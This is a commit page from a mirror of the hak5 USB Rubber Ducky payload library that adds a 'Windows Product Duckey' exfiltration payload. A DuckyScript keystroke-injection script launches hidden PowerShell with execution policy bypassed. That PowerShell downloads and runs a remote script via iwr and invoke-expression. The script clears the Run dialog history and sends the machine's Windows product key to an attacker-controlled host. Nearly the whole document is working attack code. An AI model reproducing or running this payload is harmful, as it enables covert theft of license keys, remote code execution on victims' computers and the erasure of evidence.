hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added payload Windows Product Duckey

pull/237/head
Julien Morice 2023-02-24 18:15:17 +01:00 committed by GitHub
parent 05f5b9c401
commit 3378957961
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 45 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
payloads/library/exfiltration/Windows-Product-Duckey/.ps1 Normal file
View File

@ -0,0 +1,4 @@
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit

14
payloads/library/exfiltration/Windows-Product-Duckey/old_payload.txt Normal file
View File

@ -0,0 +1,14 @@
REM Title: Windows Product Duckey
REM Author: Who-Is-Julien
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
REM Target: Windows 10, 11
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
DELAY 500
ENTER

17
payloads/library/exfiltration/Windows-Product-Duckey/payload.txt Normal file
View File

@ -0,0 +1,17 @@
REM Title: Windows Product Duckey
REM Author: Who-Is-Julien
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
REM Target: Windows 10, 11
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
STRING REMOTE_IP_ADDRESS
STRING /.ps1; invoke-expression $pl
DELAY 500
ENTER

10
payloads/library/exfiltration/Windows-Product-Duckey/source.ps1 Normal file
View File

@ -0,0 +1,10 @@
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
#clear windows run dialog history
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
#retrieve and send the computer's original product key to a remote server
Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
Exit